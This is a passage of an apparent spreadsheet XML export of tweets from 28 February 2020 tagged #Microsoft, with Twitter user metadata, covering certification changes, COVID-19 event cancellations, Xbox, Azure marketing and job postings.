    <t>Fri Feb 28 12:38:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Learning Blog post - MCSA, MCSD, MCSE certifications retire; with continued investment to role-based certifications https://t.co/jHwM2szqWa #msft #microsoft #msft #infosec #cert</t>
  </si>
  <si>
    <t>{'id': 17235778, 'id_str': '17235778', 'name': 'Pete Zerger', 'screen_name': 'pzerger', 'location': '43.623508,-79.494019', 'description': '14-Time MS MVP * CISSP * Author * Speaker * Azure * Cybersecurity * DevOps * LinkedIn Learning Trainer', 'url': 'https://t.co/tuw75Q11nT', 'entities': {'url': {'urls': [{'url': 'https://t.co/tuw75Q11nT', 'expanded_url': 'http://bit.ly/InsideAzureMgmt', 'display_url': 'bit.ly/InsideAzureMgmt', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9458, 'friends_count': 973, 'listed_count': 606, 'created_at': 'Fri Nov 07 18:24:24 +0000 2008', 'favourites_count': 1469, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17466,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'http://pbs.twimg.com/profile_images/892038897374445568/l6Jeeye1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/892038897374445568/l6Jeeye1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17235778/1501851815',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</si>
  <si>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Feb 28 12:36:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft pulls out of #Game #Developers Conference 2020 over #coronavirus concerns
https://t.co/xh5ajc0TzW will instead stream its planned sessions on its website
#Facebook, #Electronic Arts and #Sony's PlayStation have also opted to skip the conference https://t.co/P2XTgUVL2A</t>
  </si>
  <si>
    <t>{'id': 1223488255263309829, 'id_str': '1223488255263309829', 'name': 'Nexever Pvt Ltd', 'screen_name': 'nexever', 'location': '', 'description': 'We are the leading IT services company committed to offering end-to-end solutions to our customers all across the world.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 43, 'listed_count': 0, 'created_at': 'Sat Feb 01 06:08:54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'http://pbs.twimg.com/profile_images/1223488497996070912/iQpNXyy3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223488497996070912/iQpNXyy3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1223488255263309829/1580537659',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</si>
  <si>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12:33:59 +0000 2020</t>
  </si>
  <si>
    <t>Interested in creating live and intuitive visualization reports with Power BI? Heres a guide https://t.co/Spi0wRhLiI that will help you with this.
#PowerBI #BI #Tech #FridayMotivation #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 12:33:04 +0000 2020</t>
  </si>
  <si>
    <t>Help Your# Business Thrive in the phase of #Cloud_Computing.
Find a #scalable &amp;amp; #secure #Cloud #Platform that fits your business needs.
Contact us today!
#microsoft #Serverless
#DigitalTransformation
#azureclouds
#microsoft 
#azure https://t.co/z8sfa3x9ph</t>
  </si>
  <si>
    <t>Fri Feb 28 12:30:42 +0000 2020</t>
  </si>
  <si>
    <t>#GoldPartner #Microsoft #Salesforce use #Prosci framework for #cloudadoption #accelerateadoption engaging leaders and end-users with #adkar - #getcertified in Neuchatel 25.-27.03. register here: https://t.co/MAa555e8y4  (3 training days, 2 overnight stays, meals, all included) https://t.co/G9FN25er3L</t>
  </si>
  <si>
    <t>Fri Feb 28 12:30:32 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft @Google cancels events due to the outbreak of #Coronavid19.
READ: 
https://t.co/zksNYGJzwL
#Microsoft #Google #TechAuto</t>
  </si>
  <si>
    <t>{'id': 979273137136300032, 'id_str': '979273137136300032', 'name': 'India Ahead News', 'screen_name': 'IndiaAheadNews', 'location': 'India', 'description': 'Digital and Mobile platform for discovering and sharing news on the go.', 'url': 'https://t.co/5fv0KTHxBs', 'entities': {'url': {'urls': [{'url': 'https://t.co/5fv0KTHxBs', 'expanded_url': 'http://www.indiaaheadnews.com/', 'display_url': 'indiaaheadnews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3029, 'friends_count': 124, 'listed_count': 5, 'created_at': 'Thu Mar 29 08:24:44 +0000 2018', 'favourites_count': 345, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20167,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'http://pbs.twimg.com/profile_images/1202099002621059072/vGaq8NDl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202099002621059072/vGaq8NDl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/979273137136300032/1579086197',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</si>
  <si>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12:30:07 +0000 2020</t>
  </si>
  <si>
    <t>Red flags have been raised following #Microsofts release of its ARM-powered device, the #SurfaceProX due to app compatibility issues. We recommend carrying out checks to ensure its compatibility within your existing infrastructure. Contact us for more https://t.co/C5Tt2t5AeJ https://t.co/MfSMKIjusW</t>
  </si>
  <si>
    <t>Fri Feb 28 12:30:01 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft     #Avtex https://t.co/orJVIU3T3c</t>
  </si>
  <si>
    <t>Fri Feb 28 12:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Barbara Hallmans will be KeyNote speaker at the next #HPE #Microsoft #HybridCloud Summit in Lisbon Portugal:  join industry experts to accelerate your #HybridCloud Strategy. Register at https://t.co/AsFDKgpD1T 
#AzureStackHub #AzureStackHCI #EdgeToCloud #HPEMSFT @b_hallmans https://t.co/WUmGWMZYxM</t>
  </si>
  <si>
    <t>Fri Feb 28 12:29:58 +0000 2020</t>
  </si>
  <si>
    <t>Having trouble knowing which Office 365 license fits your business? Have a look here to get answers.
#pongtech #cloud #microsoft #office365 #productivity #collaboration #get_started
https://t.co/8FgoXRrZN9</t>
  </si>
  <si>
    <t>{'id': 3385611292, 'id_str': '3385611292', 'name': 'Pong Tech', 'screen_name': 'pongkenya', 'location': 'Nairobi, Kenya', 'description': 'Pong agencies is an ICT company seeking to provide technology solutions to the challenges of today.', 'url': 'https://t.co/4nD4WqAhsx', 'entities': {'url': {'urls': [{'url': 'https://t.co/4nD4WqAhsx', 'expanded_url': 'http://www.pongafrica.com', 'display_url': 'pongafrica.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 455, 'listed_count': 0, 'created_at': 'Tue Jul 21 07:46:06 +0000 2015', 'favourites_count': 89, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 105,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'http://pbs.twimg.com/profile_images/990989897287815168/nsKtWQHL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/990989897287815168/nsKtWQHL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3385611292/1525105380',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</si>
  <si>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12:29:33 +0000 2020</t>
  </si>
  <si>
    <t>The different types of replication options and what you need to ask your storage vendor if you are considering a third-party storage replication solution #Microsoft #HyperV https://t.co/vI1cLuLXcW</t>
  </si>
  <si>
    <t>Fri Feb 28 12:26:58 +0000 2020</t>
  </si>
  <si>
    <t>Vacancy :
MSC Microsoft 365 Enterprise Administrators based in East London and Port Elizabeth, follow the link below for Job Specification:
https://t.co/ltd7WqyG0m
#JobSeekersSA #jobalert #hiring #applynow #itskills #ict #Microsoft365 #Microsoft https://t.co/qk0asF10dx</t>
  </si>
  <si>
    <t>{'id': 1231929593772244992, 'id_str': '1231929593772244992', 'name': 'The HR Aficionado Group', 'screen_name': 'TheHRAficionad1', 'location': 'Midrand, South Africa', 'description': 'Custom made HR &amp; Payroll Solutions \nContact us on 0108805733\nVisit our website for services infoðŸ‘‡ðŸ¾\nhttps://t.co/DLmkFAOlNR', 'url': 'https://t.co/DLmkFAOlNR', 'entities': {'url': {'urls': [{'url': 'https://t.co/DLmkFAOlNR', 'expanded_url': 'http://www.hraficionado.co.za/', 'display_url': 'hraficionado.co.za', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/DLmkFAOlNR', 'expanded_url': 'http://www.hraficionado.co.za/', 'display_url': 'hraficionado.co.za', 'indices': [99, 122]}]}}, 'protected': False, 'followers_count': 4, 'friends_count': 52, 'listed_count': 0, 'created_at': 'Mon Feb 24 13:11:32 +0000 2020', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1231930831108804613/Uia4_j50_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231930831108804613/Uia4_j50_normal.jpg',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</si>
  <si>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12:26:06 +0000 2020</t>
  </si>
  <si>
    <t>No @cloudfest this year due to Coronavirus! Several other events are being canceled too or planned to be canceled! Check before you go! #cloudfest #azure #microsoft https://t.co/utBSsZy5bZ</t>
  </si>
  <si>
    <t>{'id': 1595576580, 'id_str': '1595576580', 'name': 'Jeroen', 'screen_name': 'jwint80', 'location': 'Nederland', 'description': 'MCT,\nHybrid Cloud Consultant / Premier Field Engineer @ Microsoft\nTweets and Comments are my own opinion not that from my employer.', 'url': 'https://t.co/YMSwiEVLQ9', 'entities': {'url': {'urls': [{'url': 'https://t.co/YMSwiEVLQ9', 'expanded_url': 'http://jeroenwint.com', 'display_url': 'jeroenwint.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 767, 'friends_count': 1980, 'listed_count': 41, 'created_at': 'Mon Jul 15 11:11:19 +0000 2013', 'favourites_count': 5123, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4307,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'http://pbs.twimg.com/profile_images/1071031770055892995/eV5L359u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1071031770055892995/eV5L359u_normal.jpg',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</si>
  <si>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12:23:52 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X Smart Delivery https://t.co/SZrJO1NJYq via @YouTube #XboxSeriesX #XboxOne #Microsoft #Xbox #Nextgenconsoles #Gears5 #Gaming #gameplaycommentary #gameplay #gamers #gamer #games #game</t>
  </si>
  <si>
    <t>{'id': 3362009500, 'id_str': '3362009500', 'name': 'Rashad McCardy', 'screen_name': 'Feedingfrenzy91', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 607, 'friends_count': 37, 'listed_count': 7, 'created_at': 'Mon Jul 06 06:37:26 +0000 2015', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4262,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</si>
  <si>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Feb 28 12:21:08 +0000 2020</t>
  </si>
  <si>
    <t>#TokyoDisneyland CLOSED !
.@bts_bighit CANCELED ! #BTSARMY 
@GreenDay CANCELED ! #GREENDAY
#Facebook #Microsoft pull out of game dev. conference in #California . #MorningJoe  #CoronavirusOutbreak #COVID19US https://t.co/lXNlUL3ufm</t>
  </si>
  <si>
    <t>{'id': 56799190, 'id_str': '56799190', 'name': 'ðŸŽ¬ ðŸŒŸ ðŸŽ¥', 'screen_name': 'HollywoodBlvd1', 'location': 'In Hollywood/On Hollywood', 'description': 'News Correspondent , Investigative Journalist, Activist - #Hollywood', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1927, 'friends_count': 3659, 'listed_count': 128, 'created_at': 'Tue Jul 14 20:03:29 +0000 2009', 'favourites_count': 120482, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 73573, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '303D5D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201854428338278406/Ow8ufW-E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201854428338278406/Ow8ufW-E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56799190/1583323080', 'profile_link_color': 'FAB81E', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'C2C5D1', 'profile_text_color': 'D4443F', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 12:20:29 +0000 2020</t>
  </si>
  <si>
    <t>Interesting read: "Sorgenia is the utility with the highest rate of customer acquisition through digital channels in Italy". 
Find out how #Accenture, #Avanade and #Microsoft partnered with Sorgenia to design and develop their journey to the #cloud. https://t.co/c6EcD2oxEu</t>
  </si>
  <si>
    <t>{'id': 3930053488, 'id_str': '3930053488', 'name': 'Jeroen van de Beek', 'screen_name': 'Jeroen_vd_Beek', 'location': 'Netherlands', 'description': 'Group Manager Energy &amp; Utilities | @Microsoft ecosystem | Now. Imagine. https://t.co/jpiYtAtNOj', 'url': 'https://t.co/sgrSsrTElj', 'entities': {'url': {'urls': [{'url': 'https://t.co/sgrSsrTElj', 'expanded_url': 'https://nl.linkedin.com/in/jeroenvandebeek', 'display_url': 'nl.linkedin.com/in/jeroenvandeâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/jpiYtAtNOj', 'expanded_url': 'https://www.avanade.com/en/about-avanade', 'display_url': 'avanade.com/en/about-avanaâ€¦', 'indices': [72, 95]}]}}, 'protected': False, 'followers_count': 61, 'friends_count': 81, 'listed_count': 8, 'created_at': 'Sun Oct 11 18:24:39 +0000 2015', 'favourites_count': 68, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 107,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'http://pbs.twimg.com/profile_images/1066467919134162946/mI6QjXW6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1066467919134162946/mI6QjXW6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3930053488/1487887901',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</si>
  <si>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12:20:00 +0000 2020</t>
  </si>
  <si>
    <t>Adjust your learning paths ASAP! 
#microsoft #certification #MicrosoftTrainer #MCT #MCSE #MCSA #MCSD https://t.co/BLkVL9k6xQ</t>
  </si>
  <si>
    <t>{'id': 440199263, 'id_str': '440199263', 'name': 'Karim Slaoui', 'screen_name': 'Karim_Slaoui', 'location': 'Sydney, New South Wales', 'description': 'Automate this! Cloud that! | #DevOps | #Powershell | #Azure | #AzureDevOps | #ConfigMgr | #MEM', 'url': 'https://t.co/TjJ7KG29rD', 'entities': {'url': {'urls': [{'url': 'https://t.co/TjJ7KG29rD', 'expanded_url': 'http://slaoui.com', 'display_url': 'slaoui.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 498, 'listed_count': 2, 'created_at': 'Sun Dec 18 17:58:59 +0000 2011', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 170,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'http://pbs.twimg.com/profile_images/831361159785639936/XLFFUdbM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/831361159785639936/XLFFUdbM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/440199263/1529373311',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</si>
  <si>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12:17:37 +0000 2020</t>
  </si>
  <si>
    <t>IBM and #Microsoft sign Vatican pledge for #ethical #AI https://t.co/JAJGT57uf9</t>
  </si>
  <si>
    <t>Fri Feb 28 12:16:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft begins blocking 'unwanted applications' like adware and cryptominers, using Edge
by @markhachman
https://t.co/Aef1QcPRAL</t>
  </si>
  <si>
    <t>{'id': 813381723685785602, 'id_str': '813381723685785602', 'name': 'Viktoria Vishniak', 'screen_name': 'viwviktoria', 'location': 'United States', 'description': 'Product Specialist at @starwindsan #Virtualization #SQLServer #VMware #vSphere #HyperV #VSAN #Traveling #StarWind', 'url': 'https://t.co/Pmb9jPKSb2', 'entities': {'url': {'urls': [{'url': 'https://t.co/Pmb9jPKSb2', 'expanded_url': 'https://www.starwind.com', 'display_url': 'starwind.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8923, 'friends_count': 7936, 'listed_count': 75, 'created_at': 'Mon Dec 26 13:51:29 +0000 2016', 'favourites_count': 1067, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2545,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'http://pbs.twimg.com/profile_images/821303031996317696/0MgAeLK8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/821303031996317696/0MgAeLK8_normal.jpg',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</si>
  <si>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12:06:53 +0000 2020</t>
  </si>
  <si>
    <t>Noble of #Microsoft to try to keep Yammer separate from Teams as they also aggressively push for use of Teams. To me, it makes #Yammer more vulnerable as it competes with Workplace by Facebook and Slack.  IMO they need to fold into Teams
https://t.co/rQ3tJnAYPU via @computerworld</t>
  </si>
  <si>
    <t>Fri Feb 28 12:04:52 +0000 2020</t>
  </si>
  <si>
    <t>. @TexasChildrens' John Hamm explains how their use of #ArtificialIIntelligence has enabled their #radiology department to create a better care path in the most complex cases.
#HPEalliances #Microsoft #HybridCloud #AI #Healthcare #MachineLearning #HCIT #HealthTech https://t.co/fqPLKA2MoK</t>
  </si>
  <si>
    <t>Fri Feb 28 12:02:03 +0000 2020</t>
  </si>
  <si>
    <t>#Register and get #access to the #status #report and hundreds of other #document #templates from https://t.co/ju60HufBGv
#microsoft #design #business #uk #sales #picture #new #cool #entrepreneur #smallbusiness #online #excel #powerpoint #trending #follow #spreadsheet https://t.co/724WM2PBxf</t>
  </si>
  <si>
    <t>Fri Feb 28 12:01:59 +0000 2020</t>
  </si>
  <si>
    <t>On Thursday April 23rd I will be providing a free day full of training at #Microsoft #Azure Training Day on Modern Operations. You can register today on https://t.co/ozG1rCRlR4, so don't miss out and see you there.</t>
  </si>
  <si>
    <t>{'id': 442918026, 'id_str': '442918026', 'name': 'Eldert Grootenboer', 'screen_name': 'egrootenboer', 'location': 'Rotterdam', 'description': 'Microsoft Azure MVP | Cloud Solution Architect | Azure | IoT | Speaker | Blogger | Published Author | Motion10', 'url': 'http://t.co/rf3ZEA27XH', 'entities': {'url': {'urls': [{'url': 'http://t.co/rf3ZEA27XH', 'expanded_url': 'http://blog.eldert.net', 'display_url': 'blog.eldert.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1277, 'friends_count': 477, 'listed_count': 90, 'created_at': 'Wed Dec 21 16:18:58 +0000 2011', 'favourites_count': 13406, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8519,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'http://pbs.twimg.com/profile_images/1199051919500697607/YtTzKbOs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199051919500697607/YtTzKbOs_normal.jpg',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</si>
  <si>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12:01:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft does not think you should use Edge Canary as your default browser https://t.co/zg8U5TXAYI #microsoft #feedly</t>
  </si>
  <si>
    <t>Fri Feb 28 12:01:26 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/HWp10MvLYi</t>
  </si>
  <si>
    <t>{'id': 3319991453, 'id_str': '3319991453', 'name': 'Vertical Solutions', 'screen_name': 'verticalrln', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 115, 'listed_count': 16, 'created_at': 'Fri Jun 12 01:04:25 +0000 2015', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 562,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'http://pbs.twimg.com/profile_images/692400157229486080/EZTq8tx1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/692400157229486080/EZTq8tx1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3319991453/1434071557',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</si>
  <si>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12:01:18 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Who doesn't want to streamline accounting, better manage costs, and connect with customers? Excellent article on #growthhacks for small businesses. Check it out here:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/0xNQKbATtF</t>
  </si>
  <si>
    <t>Fri Feb 28 12:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Compare #AWS Device Farm, #Google Firebase Test Lab and #Microsoft Studio App Center Test. https://t.co/MRMNO4vEoZ</t>
  </si>
  <si>
    <t>Fri Feb 28 12:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Namya Joshi is training #teachers around the world on how to use #Minecraft as a learning tool ! @rajatagr #Microsoft #Ludhiana #MicrosoftEDU https://t.co/R0t31UF7Kc #MSFTAdvocate</t>
  </si>
  <si>
    <t>Fri Feb 28 12:00:04 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience. #Microsoft #Microsoft365 https://t.co/mDf3Whu0Si</t>
  </si>
  <si>
    <t>{'id': 14529735, 'id_str': '14529735', 'name': 'Greg DeYoung', 'screen_name': 'gregdeyoung', 'location': '', 'description': 'Technology Strategist @ #Microsoft #DigitalTransformation #MicrosoftEDU #MIEexpert #edtech #cio #leadership #cloud #Azure #Office365 #OneNote #MicrosoftTeams', 'url': 'https://t.co/Z8EhCyU2tc', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z8EhCyU2tc', 'expanded_url': 'https://www.linkedin.com/in/gregdeyoung/', 'display_url': 'linkedin.com/in/gregdeyoung/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1168, 'friends_count': 1517, 'listed_count': 111, 'created_at': 'Fri Apr 25 17:14:16 +0000 2008', 'favourites_count': 357, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2947,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'http://pbs.twimg.com/profile_images/663774689156841472/swmbrwoJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/663774689156841472/swmbrwoJ_normal.jpg',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</si>
  <si>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11:57:31 +0000 2020</t>
  </si>
  <si>
    <t>Meet your organizational requirements around data visualization and analytics with Advaiya's upcoming DIAD workshop, in partnership with @Microsoft. 
#DataAnalytics #BusinessAnalytics #DataScience #Data #PowerBI #Dashboards #BusinessIntelligence #Analytics #Technology #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 11:56:12 +0000 2020</t>
  </si>
  <si>
    <t>Free Microsoft 70-779 Test - Analyzing Data with Microsoft Excel
https://t.co/SJ9TMCzb1n
#microsoft #msexcel #freeTest #freeMockup #mockup #quiz #mockuptest #Free #Engineering #Engineer #PracticeTest #FreeTest https://t.co/3dUwUjlSoA</t>
  </si>
  <si>
    <t>Fri Feb 28 11:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Google, Microsoft to step up production in Vietnam amid Covid-19 #Vietnam #Microsoft #China #Apple #Iphone #Covid19 #coronavirus #ncov 
https://t.co/TaYZ6uSGg7 https://t.co/A1iLAADNSq</t>
  </si>
  <si>
    <t>{'id': 917574143813459968, 'id_str': '917574143813459968', 'name': 'Hanoitimes', 'screen_name': 'Hanoitimes2', 'location': 'Hanoi, Vietnam', 'description': 'Online newspaper: News about Hanoi, the capital of Vietnam\nhttps://t.co/UEIpgY9LQb\nhttps://t.co/E2eRz4ECDm', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/UEIpgY9LQb', 'expanded_url': 'https://www.facebook.com/hanoitimes2017/', 'display_url': 'facebook.com/hanoitimes2017/', 'indices': [59, 82]}, {'url': 'https://t.co/E2eRz4ECDm', 'expanded_url': 'http://hanoitimes.com.vn/', 'display_url': 'hanoitimes.com.vn', 'indices': [83, 106]}]}}, 'protected': False, 'followers_count': 383, 'friends_count': 88, 'listed_count': 10, 'created_at': 'Tue Oct 10 02:14:58 +0000 2017', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2379, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/917575104229343232/1iGXyF01_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/917575104229343232/1iGXyF01_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/917574143813459968/1507602542',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</si>
  <si>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11:55:25 +0000 2020</t>
  </si>
  <si>
    <t>IGN just posted up these epic power comparison pictures!!! I'm so excited for the Xbox X series!!! Still not happy with the look but I'll live lol 
.
.
.
#ign #xbox #xseries #nextgen #nextgeneration #Microsoft... https://t.co/3VlbCm9GVr</t>
  </si>
  <si>
    <t>{'id': 173221714, 'id_str': '173221714', 'name': 'J.D World', 'screen_name': 'jasondomican', 'location': 'Hammersmith, London ', 'description': 'J.D Streams official twitter page\n\nðŸ‘¨\u200dðŸ‘§PROUD FATHER\n\nâ˜º POSITIVITY \n\nâ™¥ LOVE THE MRS \n\nðŸŽ® BORN TO GAME\n\nðŸ“º YOUTUBE UPLOADER', 'url': 'https://t.co/qSRKKKLtW1', 'entities': {'url': {'urls': [{'url': 'https://t.co/qSRKKKLtW1', 'expanded_url': 'http://youtube.com/jasondomican1991', 'display_url': 'youtube.com/jasondomican19â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 29, 'listed_count': 22, 'created_at': 'Sat Jul 31 19:41:38 +0000 2010', 'favourites_count': 98, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7097,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'http://pbs.twimg.com/profile_images/1193156074284687360/QGTugAZh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193156074284687360/QGTugAZh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/173221714/1534350579', 'profile_link_color': '009999',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</si>
  <si>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Feb 28 11:53:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will retire #MCSA, #MCSD, &amp;amp; #MSCE certifications on June 30, 2022. https://t.co/b81vpE0Geu</t>
  </si>
  <si>
    <t>Fri Feb 28 11:53:13 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/C4OGrlezz5 #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/XKY3zH6K1B</t>
  </si>
  <si>
    <t>Fri Feb 28 11:53:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft says it's determined to ensure safety of Xbox customers 
#Microsoft #Xbox #Gaming https://t.co/iDE8DP02pX</t>
  </si>
  <si>
    <t>Fri Feb 28 11:53:02 +0000 2020</t>
  </si>
  <si>
    <t>Building Your First Blazor App? Join @DevExpress webinar Tuesday 3/3/2020 with @JMBucknall @paul__usher  &amp;amp; @carlfranklin (extended Q&amp;amp;A) 
https://t.co/mWjM9w2mYC
#blazor  #wasm #webassembly  #dotnetcore #aspnetcore #microsoft #development  #dotnetcore  #webdevelopers #csharp</t>
  </si>
  <si>
    <t>Fri Feb 28 11:49:15 +0000 2020</t>
  </si>
  <si>
    <t>Free Administering Microsoft SQL Database (Exam 70-764)
https://t.co/2atGoAE9U7
#Microsoft #SQL #SQLDataBase #Database #databases #DBAs #dba #MSDBA #Server #Administrator #Admin #Administration #Practice #freeTest #freeMockup #mockup #quiz #mockuptest #Free https://t.co/Ka1vP3LvOn</t>
  </si>
  <si>
    <t>Fri Feb 28 11:46:59 +0000 2020</t>
  </si>
  <si>
    <t>#Register and get #access to the #status #report and hundreds of other #document #templates from https://t.co/ygRK5SN9zy
#microsoft #design #business #uk #sales #picture #new #cool #entrepreneur #smallbusiness #online #excel #powerpoint #trending #follow #spreadsheet #startups https://t.co/zDwSJJSrDB</t>
  </si>
  <si>
    <t>Fri Feb 28 11:45:53 +0000 2020</t>
  </si>
  <si>
    <t>The recording from yesterdays webcast is up along with related resources- Microsoft Teams Live Events Webcast #Microsoft #microsoftteams #microsoftstream #technology  https://t.co/CoKa3j7eht</t>
  </si>
  <si>
    <t>Fri Feb 28 11:45:10 +0000 2020</t>
  </si>
  <si>
    <t>Are you aware that #Microsoft have recently launched Office 2019 for #Windows and #Mac? Read all about it here: https://t.co/d8lT9R18gI #wearedatcom https://t.co/DTkzwPuCMW</t>
  </si>
  <si>
    <t>Fri Feb 28 11:42:32 +0000 2020</t>
  </si>
  <si>
    <t>Reasons for Taking #Microsoft 70-740 #Exam Through Using Exam Dumps in Prep... https://t.co/36DLxKtqXw @TechBullion</t>
  </si>
  <si>
    <t>Fri Feb 28 11:41:35 +0000 2020</t>
  </si>
  <si>
    <t>Book your seat to our IT, Project &amp;amp; Process Management and English #courses running during the month of March @#Formatech. For more details call us on 961 1 611 111  #Microsoft  #office #Cisco #Oracle  #PMPTraining #Database  #pmp #EnglishCambridge https://t.co/C6IfSigpgu</t>
  </si>
  <si>
